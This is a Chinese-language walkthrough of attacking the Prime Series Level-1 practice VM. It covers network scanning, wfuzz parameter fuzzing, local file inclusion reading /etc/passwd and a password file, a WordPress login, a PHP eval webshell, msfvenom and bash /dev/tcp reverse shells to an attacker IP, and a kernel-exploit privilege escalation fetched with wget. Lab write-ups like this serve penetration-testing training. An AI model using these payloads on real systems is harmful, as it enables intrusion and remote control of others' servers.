渗透测试（五）- prime_Series靶机攻略

靶机地址：

通过百度网盘分享的文件：Prime_Series_Level-1.rar
链接：https://pan.baidu.com/s/10ibEa4y6C8lKRsTHY1ROTw?pwd=a6cr 
提取码：a6cr 
--来自百度网盘超级会员V1的分享

实现步骤：

主机发现，使用arp-scan -l命令扫描局域网内存在的设备

发现了192.168.111.4的靶机IP地址

在扫描该靶机开放的端口，发现开启了22,80端口

打开网页，只有一张图片，没有任何其他信息

使用dirb目录扫描

打开/dev，看到了以下信息

使用dirb工具扫描PHP文件和TXT文件，这里扫出了三个

dirb http://192.168.119.128 -X .php,.txt

打开/secret.txt发现提示中提供了一个可用的fuzz工具

根据提示，通过fuzz出正确参数，读取该文件。根据工具使用说明，使用如下命令。

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hl 7 http://192.168.111.4/index.php?FUZZ=location.txt

说明：-w 指定字典路径。

      --hl 7 是过滤条件，过滤Lines为7L的响应结果，过滤条件还可以过滤响应码如--hc 404、过滤Word如--hw 42、过滤Chars如--hh 334。

      FUZZ 是指定爆破的位置，字典会在FUZZ位置跑。

利用工具发现了可利用的参数是file，通过浏览器访问http://192.168.111.4/index.php?file=location.txt

得到下一阶段提示：在其他PHP页面中有secrettier360参数可以被利用。

继续使用fuzzing工具。

命令：wfuzz -w /usr/share/wfuzz/wordlist/Injections/All_attack.txt --hl 6 http://192.168.111.4/image.php?secrettier360=FUZZ

这里使用了另一个wordlist，All_attack.txt里有常用敏感路径。

同样浏览器访问192.168.111.4/image.php?secrettier360=/etc/passwd

获得提示：find password.txt file in my directory:/home/saket

所以浏览器访问：http://192.168.111.4/image.php?secrettier360=/home/saket/password.txt

获得密码：follow_the_ippsec

在阶段一扫描目录时，已知该网站是个WordPress。可以访问：http://192.168.119.128/wordpress/ 可以看到有个Victor用户。

Follow_the_ippsec

点进登录界面，尝试用获取的密码登录，可以看到成功登录

使用一句话木马注入，发现无法使用意见进行连接，尝试换个方法

<?php $eval($_POST['cmd']);?>

MSF反弹shell

让受害者的服务器主动连我们 反弹连接shell

Msf开启监听端口7777，并设置目标主机

 MSF生成木马文件
msfvenom -p php/meterpreter/reverse_tcp lhost=kali IP  lport=开放端口 -o shell.php（木马文件）

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.184.135  lport=7777 -o shell.php

或者复制以下代码

<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.111.111/9999 0>&1'");

?>

Wordpress  目录    wordpress/wp-content/themes/twentynineteen

构造Payload  http://192.168.111.4/wordpress/wp-content/themes/twentynineteen/secret.php

浏览器访问Payload   访问链接 直接反弹连接

尝试提权，sudo –l查看权限，发现目录/home/saket/enc，提示信息(root) NOPASSWD: /home/saket/enc

查看/home/saket/enc，打开发现了user.txt

打开后，发现了flag

同时我们用ls -liah也可以看到，我们没有对enc的读权限，它应该是一个重要文件

但是找了一圈也没发现什么密码，我们用uname -a查看版本发现是较早的版本：

Linux ubuntu 4.10.0-28-generic

那么查找一下漏洞用searchsploit命令

searchsploit Linux ubuntu 4.10.0-28

下载漏洞并查看

应该就是gcc编译一下就可以了

打开php服务

同时再靶机中进行下载

wget http://192.168.111.111/45010.c

编译执行

提权成功，给shell环境

python -c "import pty;pty.spawn('/bin/bash')"